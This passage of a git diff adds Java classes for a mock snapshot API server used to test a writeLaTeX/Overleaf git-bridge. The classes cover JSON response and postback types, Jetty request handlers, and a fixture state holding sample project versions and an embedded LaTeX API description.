+ */ +public class SnapshotGetForVerResponse extends SnapshotResponse { + + private final GetForVersionResult state; + + public SnapshotGetForVerResponse(GetForVersionResult state) { + this.state = state; + } + + @Override + public String respond() { + return state.toJson().toString(); + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/servermock/response/getsavedver/SnapshotGetSavedVersResponse.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/servermock/response/getsavedver/SnapshotGetSavedVersResponse.java new file mode 100644 index 0000000..a8da86b --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/servermock/response/getsavedver/SnapshotGetSavedVersResponse.java @@ -0,0 +1,21 @@ +package uk.ac.ic.wlgitbridge.snapshot.servermock.response.getsavedver; + +import uk.ac.ic.wlgitbridge.snapshot.getsavedvers.GetSavedVersResult; +import uk.ac.ic.wlgitbridge.snapshot.servermock.response.SnapshotResponse; + +/* + * Created by Winston on 09/01/15. + */ +public class SnapshotGetSavedVersResponse extends SnapshotResponse { + + private final GetSavedVersResult state; + + public SnapshotGetSavedVersResponse(GetSavedVersResult state) { + this.state = state; + } + + @Override + public String respond() { + return state.toJson().toString(); + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/servermock/response/push/SnapshotPushResponse.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/servermock/response/push/SnapshotPushResponse.java new file mode 100644 index 0000000..4568f60 --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/servermock/response/push/SnapshotPushResponse.java @@ -0,0 +1,34 @@ +package uk.ac.ic.wlgitbridge.snapshot.servermock.response.push; + +import uk.ac.ic.wlgitbridge.snapshot.servermock.response.SnapshotResponse; +import uk.ac.ic.wlgitbridge.snapshot.servermock.response.push.data.SnapshotPushResult; +import uk.ac.ic.wlgitbridge.snapshot.servermock.response.push.postback.SnapshotPostbackRequest; + +/* + * Created by Winston on 09/01/15. + */ +public class SnapshotPushResponse extends SnapshotResponse { + + private final SnapshotPushResult stateForPush; + private final SnapshotPostbackRequest stateForPostback; + + public SnapshotPushResponse( + SnapshotPushResult stateForPush, SnapshotPostbackRequest stateForPostback) { + this.stateForPush = stateForPush; + this.stateForPostback = stateForPostback; + } + + @Override + public String respond() { + return stateForPush.toJson().toString(); + } + + @Override + public String postback() { + if (stateForPush.hasPostback()) { + return stateForPostback.toJson().toString(); + } else { + return null; + } + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/servermock/response/push/data/SnapshotPushResult.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/servermock/response/push/data/SnapshotPushResult.java new file mode 100644 index 0000000..cdcd893 --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/servermock/response/push/data/SnapshotPushResult.java @@ -0,0 +1,30 @@ +package uk.ac.ic.wlgitbridge.snapshot.servermock.response.push.data; + +import com.google.gson.JsonElement; +import com.google.gson.JsonObject; + +/* + * Created by Winston on 09/01/15. 
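+ * Base class for mock push responses: serialises a status, code and message to JSON, and says whether the push should be followed by a postback.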
+ */ +public abstract class SnapshotPushResult { + + private final int status; + private final String code; + private final String message; + + public SnapshotPushResult(int status, String code, String message) { + this.status = status; + this.code = code; + this.message = message; + } + + public JsonElement toJson() { + JsonObject jsonThis = new JsonObject(); + jsonThis.addProperty("status", status); + jsonThis.addProperty("code", code); + jsonThis.addProperty("message", message); + return jsonThis; + } + + public abstract boolean hasPostback(); +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/servermock/response/push/data/SnapshotPushResultOutOfDate.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/servermock/response/push/data/SnapshotPushResultOutOfDate.java new file mode 100644 index 0000000..d6b7eea --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/servermock/response/push/data/SnapshotPushResultOutOfDate.java @@ -0,0 +1,16 @@ +package uk.ac.ic.wlgitbridge.snapshot.servermock.response.push.data; + +/* + * Created by Winston on 09/01/15. + */ +public class SnapshotPushResultOutOfDate extends SnapshotPushResult { + + public SnapshotPushResultOutOfDate() { + super(409, "outOfDate", "Out of Date"); + } + + @Override + public boolean hasPostback() { + return false; + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/servermock/response/push/data/SnapshotPushResultSuccess.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/servermock/response/push/data/SnapshotPushResultSuccess.java new file mode 100644 index 0000000..948105b --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/servermock/response/push/data/SnapshotPushResultSuccess.java @@ -0,0 +1,16 @@ +package uk.ac.ic.wlgitbridge.snapshot.servermock.response.push.data; + +/* + * Created by Winston on 09/01/15. + */ +public class SnapshotPushResultSuccess extends SnapshotPushResult { + + public SnapshotPushResultSuccess() { + super(202, "accepted", "Accepted"); + } + + @Override + public boolean hasPostback() { + return true; + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/servermock/response/push/postback/SnapshotPostbackRequest.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/servermock/response/push/postback/SnapshotPostbackRequest.java new file mode 100644 index 0000000..8560714 --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/servermock/response/push/postback/SnapshotPostbackRequest.java @@ -0,0 +1,21 @@ +package uk.ac.ic.wlgitbridge.snapshot.servermock.response.push.postback; + +import com.google.gson.JsonObject; + +/* + * Created by Winston on 09/01/15.
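+ * Base class for the mock postbacks sent after a push; subclasses add their own fields to the basic {"code": ...} object.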
+ */ +public abstract class SnapshotPostbackRequest { + + private final String code; + + public SnapshotPostbackRequest(String code) { + this.code = code; + } + + public JsonObject toJson() { + JsonObject jsonThis = new JsonObject(); + jsonThis.addProperty("code", code); + return jsonThis; + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/servermock/response/push/postback/SnapshotPostbackRequestError.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/servermock/response/push/postback/SnapshotPostbackRequestError.java new file mode 100644 index 0000000..27e4b7b --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/servermock/response/push/postback/SnapshotPostbackRequestError.java @@ -0,0 +1,20 @@ +package uk.ac.ic.wlgitbridge.snapshot.servermock.response.push.postback; + +import com.google.gson.JsonObject; + +/* + * Created by Winston on 10/01/15. + */ +public class SnapshotPostbackRequestError extends SnapshotPostbackRequest { + + public SnapshotPostbackRequestError() { + super("error"); + } + + @Override + public JsonObject toJson() { + JsonObject jsonThis = super.toJson(); + jsonThis.addProperty("message", "Unexpected Error"); + return jsonThis; + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/servermock/response/push/postback/SnapshotPostbackRequestInvalidFiles.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/servermock/response/push/postback/SnapshotPostbackRequestInvalidFiles.java new file mode 100644 index 0000000..e4bd120 --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/servermock/response/push/postback/SnapshotPostbackRequestInvalidFiles.java @@ -0,0 +1,39 @@ +package uk.ac.ic.wlgitbridge.snapshot.servermock.response.push.postback; + +import com.google.gson.JsonArray; +import com.google.gson.JsonElement; +import com.google.gson.JsonObject; +import java.util.ArrayList; +import java.util.List; +import uk.ac.ic.wlgitbridge.snapshot.servermock.response.push.postback.invalidfile.InvalidFileError; + +/* + * Created by Winston on 09/01/15. 
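+ * Postback reporting invalid files in the pushed snapshot; each entry is an InvalidFileError serialised into the "errors" array.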
+ */ +public class SnapshotPostbackRequestInvalidFiles extends SnapshotPostbackRequest { + + private final List<InvalidFileError> errors; + + public SnapshotPostbackRequestInvalidFiles(List<InvalidFileError> errors) { + super("invalidFiles"); + this.errors = errors; + } + + public SnapshotPostbackRequestInvalidFiles(JsonArray errors) { + this(new ArrayList<InvalidFileError>()); + for (JsonElement error : errors) { + this.errors.add(InvalidFileError.buildFromJsonError(error.getAsJsonObject())); + } + } + + @Override + public JsonObject toJson() { + JsonObject jsonThis = super.toJson(); + JsonArray jsonErrors = new JsonArray(); + for (InvalidFileError error : errors) { + jsonErrors.add(error.toJson()); + } + jsonThis.add("errors", jsonErrors); + return jsonThis; + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/servermock/response/push/postback/SnapshotPostbackRequestInvalidProject.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/servermock/response/push/postback/SnapshotPostbackRequestInvalidProject.java new file mode 100644 index 0000000..fbdfabe --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/servermock/response/push/postback/SnapshotPostbackRequestInvalidProject.java @@ -0,0 +1,40 @@ +package uk.ac.ic.wlgitbridge.snapshot.servermock.response.push.postback; + +import com.google.gson.JsonArray; +import com.google.gson.JsonElement; +import com.google.gson.JsonObject; +import com.google.gson.JsonPrimitive; +import java.util.ArrayList; +import java.util.List; + +/* + * Created by Winston on 10/01/15. + */ +public class SnapshotPostbackRequestInvalidProject extends SnapshotPostbackRequest { + + private final List<String> errors; + + public SnapshotPostbackRequestInvalidProject(List<String> errors) { + super("invalidProject"); + this.errors = errors; + } + + public SnapshotPostbackRequestInvalidProject(JsonArray errors) { + this(new ArrayList<String>()); + for (JsonElement error : errors) { + this.errors.add(error.getAsString()); + } + } + + @Override + public JsonObject toJson() { + JsonObject jsonThis = super.toJson(); + jsonThis.addProperty("message", "short string message for debugging"); + JsonArray jsonErrors = new JsonArray(); + for (String error : errors) { + jsonErrors.add(new JsonPrimitive(error)); + } + jsonThis.add("errors", jsonErrors); + return jsonThis; + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/servermock/response/push/postback/SnapshotPostbackRequestOutOfDate.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/servermock/response/push/postback/SnapshotPostbackRequestOutOfDate.java new file mode 100644 index 0000000..43453e8 --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/servermock/response/push/postback/SnapshotPostbackRequestOutOfDate.java @@ -0,0 +1,20 @@ +package uk.ac.ic.wlgitbridge.snapshot.servermock.response.push.postback; + +import com.google.gson.JsonObject; + +/* + * Created by Winston on 09/01/15. 
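+ * Postback telling the bridge that the push was rejected because the project has moved on ("outOfDate").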
+ */ +public class SnapshotPostbackRequestOutOfDate extends SnapshotPostbackRequest { + + public SnapshotPostbackRequestOutOfDate() { + super("outOfDate"); + } + + @Override + public JsonObject toJson() { + JsonObject jsonThis = super.toJson(); + jsonThis.addProperty("message", "Out of Date"); + return jsonThis; + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/servermock/response/push/postback/SnapshotPostbackRequestSuccess.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/servermock/response/push/postback/SnapshotPostbackRequestSuccess.java new file mode 100644 index 0000000..13778ca --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/servermock/response/push/postback/SnapshotPostbackRequestSuccess.java @@ -0,0 +1,23 @@ +package uk.ac.ic.wlgitbridge.snapshot.servermock.response.push.postback; + +import com.google.gson.JsonObject; + +/* + * Created by Winston on 09/01/15. + */ +public class SnapshotPostbackRequestSuccess extends SnapshotPostbackRequest { + + private final int latestVerId; + + public SnapshotPostbackRequestSuccess(int latestVerId) { + super("upToDate"); + this.latestVerId = latestVerId; + } + + @Override + public JsonObject toJson() { + JsonObject jsonThis = super.toJson(); + jsonThis.addProperty("latestVerId", latestVerId); + return jsonThis; + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/servermock/response/push/postback/invalidfile/InvalidFileError.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/servermock/response/push/postback/invalidfile/InvalidFileError.java new file mode 100644 index 0000000..670326d --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/servermock/response/push/postback/invalidfile/InvalidFileError.java @@ -0,0 +1,38 @@ +package uk.ac.ic.wlgitbridge.snapshot.servermock.response.push.postback.invalidfile; + +import com.google.gson.JsonObject; + +/* + * Created by Winston on 09/01/15. 
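+ * One invalid-file entry in an invalidFiles postback. buildFromJsonError dispatches on the "state" field: "error", "disallowed" or "unclean_name".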
+ */ +public abstract class InvalidFileError { + + private final String file; + + public InvalidFileError(String file) { + this.file = file; + } + + public JsonObject toJson() { + JsonObject jsonThis = new JsonObject(); + jsonThis.addProperty("file", file); + jsonThis.addProperty("state", getState()); + return jsonThis; + } + + protected abstract String getState(); + + public static InvalidFileError buildFromJsonError(JsonObject error) { + String state = error.get("state").getAsString(); + String file = error.get("file").getAsString(); + if (state.equals("error")) { + return new InvalidFileErrorDefault(file); + } else if (state.equals("disallowed")) { + return new InvalidFileErrorDisallowed(file); + } else if (state.equals("unclean_name")) { + return new InvalidFileErrorUnclean(file, error.get("cleanFile").getAsString()); + } else { + throw new IllegalArgumentException("bad invalid file state: " + state); + } + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/servermock/response/push/postback/invalidfile/InvalidFileErrorDefault.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/servermock/response/push/postback/invalidfile/InvalidFileErrorDefault.java new file mode 100644 index 0000000..644d165 --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/servermock/response/push/postback/invalidfile/InvalidFileErrorDefault.java @@ -0,0 +1,16 @@ +package uk.ac.ic.wlgitbridge.snapshot.servermock.response.push.postback.invalidfile; + +/* + * Created by Winston on 09/01/15. + */ +public class InvalidFileErrorDefault extends InvalidFileError { + + public InvalidFileErrorDefault(String file) { + super(file); + } + + @Override + protected String getState() { + return "error"; + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/servermock/response/push/postback/invalidfile/InvalidFileErrorDisallowed.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/servermock/response/push/postback/invalidfile/InvalidFileErrorDisallowed.java new file mode 100644 index 0000000..fad3ac1 --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/servermock/response/push/postback/invalidfile/InvalidFileErrorDisallowed.java @@ -0,0 +1,16 @@ +package uk.ac.ic.wlgitbridge.snapshot.servermock.response.push.postback.invalidfile; + +/* + * Created by Winston on 09/01/15. + */ +public class InvalidFileErrorDisallowed extends InvalidFileError { + + public InvalidFileErrorDisallowed(String file) { + super(file); + } + + @Override + protected String getState() { + return "disallowed"; + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/servermock/response/push/postback/invalidfile/InvalidFileErrorUnclean.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/servermock/response/push/postback/invalidfile/InvalidFileErrorUnclean.java new file mode 100644 index 0000000..9c2c75b --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/servermock/response/push/postback/invalidfile/InvalidFileErrorUnclean.java @@ -0,0 +1,28 @@ +package uk.ac.ic.wlgitbridge.snapshot.servermock.response.push.postback.invalidfile; + +import com.google.gson.JsonObject; + +/* + * Created by Winston on 09/01/15. 
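+ * Invalid-file entry for a badly named file; carries the suggested clean name in the "cleanFile" property.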
+ */ +public class InvalidFileErrorUnclean extends InvalidFileError { + + private final String cleanFile; + + public InvalidFileErrorUnclean(String file, String cleanFile) { + super(file); + this.cleanFile = cleanFile; + } + + @Override + public JsonObject toJson() { + JsonObject jsonThis = super.toJson(); + jsonThis.addProperty("cleanFile", cleanFile); + return jsonThis; + } + + @Override + protected String getState() { + return "unclean_name"; + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/servermock/server/MockOAuthRequestHandler.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/servermock/server/MockOAuthRequestHandler.java new file mode 100644 index 0000000..278e15f --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/servermock/server/MockOAuthRequestHandler.java @@ -0,0 +1,23 @@ +package uk.ac.ic.wlgitbridge.snapshot.servermock.server; + +import java.io.IOException; +import javax.servlet.http.HttpServletRequest; +import javax.servlet.http.HttpServletResponse; +import org.eclipse.jetty.server.Request; +import org.eclipse.jetty.server.handler.AbstractHandler; + +public class MockOAuthRequestHandler extends AbstractHandler { + + @Override + public void handle( + String target, Request baseRequest, HttpServletRequest request, HttpServletResponse response) + throws IOException { + String method = baseRequest.getMethod(); + if (method.equals("GET") && target.equals("/oauth/token/info")) { + response.setContentType("application/json"); + response.setStatus(HttpServletResponse.SC_OK); + response.getWriter().println("{}"); + baseRequest.setHandled(true); + } + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/servermock/server/MockSnapshotRequestHandler.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/servermock/server/MockSnapshotRequestHandler.java new file mode 100644 index 0000000..53727cf --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/servermock/server/MockSnapshotRequestHandler.java @@ -0,0 +1,46 @@ +package uk.ac.ic.wlgitbridge.snapshot.servermock.server; + +import java.io.IOException; +import javax.servlet.ServletException; +import javax.servlet.http.HttpServletRequest; +import javax.servlet.http.HttpServletResponse; +import org.eclipse.jetty.server.Request; +import org.eclipse.jetty.server.handler.AbstractHandler; +import uk.ac.ic.wlgitbridge.snapshot.servermock.exception.InvalidAPICallException; +import uk.ac.ic.wlgitbridge.snapshot.servermock.response.*; +import uk.ac.ic.wlgitbridge.util.Log; + +/* + * Created by Winston on 09/01/15. 
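+ * Jetty handler for the mock API: builds the canned response for the target, writes it out, and kicks off a PostbackThread when the response carries a postback. Unknown targets are left unhandled.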
+ */ +public class MockSnapshotRequestHandler extends AbstractHandler { + + private final SnapshotResponseBuilder responseBuilder; + + public MockSnapshotRequestHandler(SnapshotResponseBuilder responseBuilder) { + this.responseBuilder = responseBuilder; + } + + @Override + public void handle( + String target, + final Request baseRequest, + HttpServletRequest request, + HttpServletResponse response) + throws IOException, ServletException { + boolean handled; + try { + final SnapshotResponse snapshotResponse = + responseBuilder.buildWithTarget(target, baseRequest.getMethod()); + response.getWriter().println(snapshotResponse.respond()); + new PostbackThread(baseRequest.getReader(), snapshotResponse.postback()).startIfNotNull(); + handled = true; + } catch (InvalidAPICallException e) { + handled = false; + } catch (RuntimeException e) { + Log.warn("Runtime exception when handling request", e); + handled = true; + } + baseRequest.setHandled(handled); + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/servermock/server/MockSnapshotServer.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/servermock/server/MockSnapshotServer.java new file mode 100644 index 0000000..2f1c0d5 --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/servermock/server/MockSnapshotServer.java @@ -0,0 +1,65 @@ +package uk.ac.ic.wlgitbridge.snapshot.servermock.server; + +import java.io.File; +import org.eclipse.jetty.server.NetworkConnector; +import org.eclipse.jetty.server.Server; +import org.eclipse.jetty.server.handler.HandlerCollection; +import org.eclipse.jetty.server.handler.HandlerList; +import org.eclipse.jetty.server.handler.ResourceHandler; +import uk.ac.ic.wlgitbridge.snapshot.servermock.response.SnapshotResponseBuilder; +import uk.ac.ic.wlgitbridge.snapshot.servermock.state.SnapshotAPIState; +import uk.ac.ic.wlgitbridge.util.Log; + +/* + * Created by Winston on 09/01/15. 
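+ * Embedded Jetty server for tests: chains the mock OAuth handler, the mock snapshot handler and a resource handler, and records the actual port it bound to after start().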
+ */ +public class MockSnapshotServer { + + private final Server server; + private final SnapshotResponseBuilder responseBuilder; + private int port; + + public MockSnapshotServer(int port, File resourceBase) { + server = new Server(port); + responseBuilder = new SnapshotResponseBuilder(); + + HandlerList handlers = new HandlerList(); + handlers.addHandler(new MockOAuthRequestHandler()); + handlers.addHandler(getHandlerForResourceBase(resourceBase)); + server.setHandler(handlers); + } + + private HandlerCollection getHandlerForResourceBase(File resourceBase) { + HandlerCollection handlers = new HandlerCollection(); + handlers.addHandler(new MockSnapshotRequestHandler(responseBuilder)); + handlers.addHandler(resourceHandlerWithBase(resourceBase)); + return handlers; + } + + private ResourceHandler resourceHandlerWithBase(File resourceBase) { + ResourceHandler resourceHandler = new ResourceHandler(); + resourceHandler.setResourceBase(resourceBase.getAbsolutePath()); + return resourceHandler; + } + + public void start() { + try { + server.start(); + } catch (Exception e) { + Log.warn("Exception when trying to start server", e); + } + port = ((NetworkConnector) server.getConnectors()[0]).getLocalPort(); + } + + public void stop() { + try { + server.stop(); + } catch (Exception e) { + Log.warn("Exception when trying to stop server", e); + } + } + + public void setState(SnapshotAPIState state) { + responseBuilder.setState(state); + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/servermock/server/PostbackThread.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/servermock/server/PostbackThread.java new file mode 100644 index 0000000..0e105ef --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/servermock/server/PostbackThread.java @@ -0,0 +1,42 @@ +package uk.ac.ic.wlgitbridge.snapshot.servermock.server; + +import static org.asynchttpclient.Dsl.*; + +import com.google.gson.Gson; +import com.google.gson.JsonObject; +import java.io.Reader; +import java.util.concurrent.ExecutionException; +import uk.ac.ic.wlgitbridge.util.Log; + +/* + * Created by Winston on 10/01/15. 
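+ * Reads the postbackUrl out of the pushed request body and POSTs the postback contents to it on a separate thread; startIfNotNull is a no-op when there is nothing to post back.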
+ */ +public class PostbackThread extends Thread { + + private String url; + private String postback; + + public PostbackThread(Reader reader, String postback) { + if (postback != null) { + url = new Gson().fromJson(reader, JsonObject.class).get("postbackUrl").getAsString(); + this.postback = postback; + } + } + + @Override + public void run() { + try { + asyncHttpClient().preparePost(url).setBody(postback).execute().get().getResponseBody(); + } catch (InterruptedException e) { + Log.warn("Interrupted on postback, url: " + url + ", postback: " + postback, e); + } catch (ExecutionException e) { + Log.warn("ExecutionException on postback, url: " + url + ", postback: " + postback, e); + } + } + + public void startIfNotNull() { + if (url != null && postback != null) { + start(); + } + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/servermock/state/SnapshotAPIState.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/servermock/state/SnapshotAPIState.java new file mode 100644 index 0000000..fa8c9b7 --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/servermock/state/SnapshotAPIState.java @@ -0,0 +1,271 @@ +package uk.ac.ic.wlgitbridge.snapshot.servermock.state; + +import java.util.*; +import uk.ac.ic.wlgitbridge.snapshot.getdoc.GetDocResult; +import uk.ac.ic.wlgitbridge.snapshot.getforversion.GetForVersionResult; +import uk.ac.ic.wlgitbridge.snapshot.getforversion.SnapshotAttachment; +import uk.ac.ic.wlgitbridge.snapshot.getforversion.SnapshotData; +import uk.ac.ic.wlgitbridge.snapshot.getforversion.SnapshotFile; +import uk.ac.ic.wlgitbridge.snapshot.getsavedvers.GetSavedVersResult; +import uk.ac.ic.wlgitbridge.snapshot.getsavedvers.SnapshotInfo; +import uk.ac.ic.wlgitbridge.snapshot.servermock.response.push.data.SnapshotPushResult; +import uk.ac.ic.wlgitbridge.snapshot.servermock.response.push.data.SnapshotPushResultSuccess; +import uk.ac.ic.wlgitbridge.snapshot.servermock.response.push.postback.SnapshotPostbackRequest; +import uk.ac.ic.wlgitbridge.snapshot.servermock.response.push.postback.SnapshotPostbackRequestInvalidProject; + +/* + * Created by Winston on 09/01/15. 
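+ *
+ * Canned responses for each mock API endpoint, keyed by project name. The
+ * no-argument constructor installs the "1826rqgsdb" fixture project. A
+ * lookup sketch (the version number is one of the fixture versions):
+ *
+ * <pre>
+ *   SnapshotAPIState state = new SnapshotAPIState();
+ *   GetDocResult doc = state.getStateForGetDoc("1826rqgsdb");
+ *   GetForVersionResult snapshot = state.getStateForGetForVers("1826rqgsdb", 243);
+ * </pre>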
+ */ +public class SnapshotAPIState { + + private Map<String, GetDocResult> getDoc; + private Map<String, GetSavedVersResult> getSavedVers; + private Map<String, Map<Integer, GetForVersionResult>> getForVers; + private Map<String, SnapshotPushResult> push; + private Map<String, SnapshotPostbackRequest> postback; + + public SnapshotAPIState( + Map<String, GetDocResult> getDoc, + Map<String, GetSavedVersResult> getSavedVers, + Map<String, Map<Integer, GetForVersionResult>> getForVers, + Map<String, SnapshotPushResult> push, + Map<String, SnapshotPostbackRequest> postback) { + this.getDoc = getDoc; + this.getSavedVers = getSavedVers; + this.getForVers = getForVers; + this.push = push; + this.postback = postback; + } + + public SnapshotAPIState() { + getDoc = new HashMap<>(); + getDoc.put( + "1826rqgsdb", + new GetDocResult(null, 243, "2014-11-30T18:40:58Z", "jdleesmiller+1@gmail.com", "John+1")); + + getSavedVers = new HashMap<String, GetSavedVersResult>(); + List<SnapshotInfo> savedVers = new LinkedList<SnapshotInfo>(); + savedVers.add( + new SnapshotInfo( + 243, + "added more info on doc GET and error details", + "jdleesmiller+1@gmail.com", + "John+1", + "2014-11-30T18:47:01Z")); + savedVers.add( + new SnapshotInfo( + 185, + "with more details on POST request", + "jdleesmiller+1@gmail.com", + "John+1", + "2014-11-11T17:18:40Z")); + savedVers.add( + new SnapshotInfo( + 175, + "with updated PUT/POST request", + "jdleesmiller+1@gmail.com", + "John+1", + "2014-11-09T23:09:13Z")); + savedVers.add( + new SnapshotInfo( + 146, + "added PUT format", + "jdleesmiller@gmail.com", + "John Lees-Miller", + "2014-11-07T15:11:35Z")); + savedVers.add( + new SnapshotInfo( + 74, + "with example output", + "jdleesmiller@gmail.com", + "John Lees-Miller", + "2014-11-05T18:09:41Z")); + savedVers.add( + new SnapshotInfo( + 39, + "with more files", + "jdleesmiller@gmail.com", + "John Lees-Miller", + "2014-11-05T18:02:19Z")); + savedVers.add( + new SnapshotInfo( + 24, + "first draft", + "jdleesmiller@gmail.com", + "John Lees-Miller", + "2014-11-05T17:56:58Z")); + getSavedVers.put("1826rqgsdb", new GetSavedVersResult(savedVers)); + + getForVers = + new HashMap<String, Map<Integer, GetForVersionResult>>() { + { + put( + "1826rqgsdb", + new HashMap<Integer, GetForVersionResult>() { + { + put( + 243, + new GetForVersionResult( + new SnapshotData( + Arrays.asList( + new SnapshotFile( + "\\\\documentclass[a4paper]{article}\\n\\n\\\\usepackage[english]{babel}\\n\\\\usepackage[utf8]{inputenc}\\n\\\\usepackage{graphicx}\\n\\\\usepackage{fullpage}\\n\\\\usepackage{listings}\\n\\\\usepackage{courier}\\n\\\\usepackage{url}\\n\\n\\\\lstset{basicstyle=\\\\ttfamily,breaklines=true}\\n\\n\\\\begin{document}\\n\\\\title{API for the writeLaTeX-Git Bridge}\\n\\\\author{JLM}\\n\\\\date{\\\\today}\\n\\\\maketitle\\n\\n\\\\section{Fetching a Project from WriteLaTeX}\\n\\nThere are three API calls that will likely be of interest. You can run them against this server, \\\\url{radiant-wind-3058.herokuapp.com}, but they're not on the production server yet.\\n\\n\\\\subsection{Get Doc}\\n\\nA ``doc'' is our internal term for a ``project''. 
This endpoint returns the latest version id, when the latest version was created (ISO8601), and the user that last edited the project (if any, otherwise null).\\n\\n\\\\begin{lstlisting}\\nGET https://.../api/v0/docs/1826rqgsdb\\n# => {\\n \\\"latestVerId\\\": 39,\\n \\\"latestVerAt\\\": \\\"2014-11-30T18:35:27Z\\\",\\n \\\"latestVerBy\\\": {\\n \\\"email\\\": \\\"jdleesmiller@gmail.com\\\",\\n \\\"name\\\": \\\"John Lees-Miller\\\"\\n }}\\n\\\\end{lstlisting}\\n\\n\\\\subsection{Get Saved Vers}\\n\\nA ``saved ver'' is a version of a doc, saved by via the versions menu. Note that this query is not currently paginated.\\n\\n\\\\begin{lstlisting}\\nGET https://.../api/v0/docs/1826rqgsdb/saved_vers\\n# => [\\n {\\\"versionId\\\":39,\\n \\\"comment\\\":\\\"with more files\\\",\\n \\\"user\\\":{\\n \\\"email\\\":\\\"jdleesmiller@gmail.com\\\",\\n \\\"name\\\":\\\"John Lees-Miller\\\"},\\n \\\"createdAt\\\":\\\"2014-11-05T18:02:19Z\\\"},\\n {\\\"versionId\\\":24,\\n \\\"comment\\\":\\\"first draft\\\",\\n \\\"user\\\":{\\n \\\"email\\\":\\\"jdleesmiller@gmail.com\\\",\\n \\\"name\\\":\\\"John Lees-Miller\\\"},\\n \\\"createdAt\\\":\\\"2014-11-05T17:56:58Z\\\"}]\\n\\\\end{lstlisting}\\n\\n\\\\subsection{Get Snapshot for Version}\\n\\nA snapshot contains the content of a project in the given version. You can safely request a snapshot of any version that is, or was at any point in the last 24 hours, (1) a saved version, or (2) the current version. (Older versions may or may not have been moved to cold storage.)\\n\\nThe srcs array contains (content, file name) pairs; the atts array contains (URL, file name) pairs.\\n\\n\\\\begin{lstlisting}\\nGET https://.../api/v0/docs/1826rqgsdb/snapshots/39\\n# => {\\n \\\"srcs\\\":[\\n [\\\"This text is from another file.\\\",\\\"foo/bar/servermock.tex\\\"],\\n 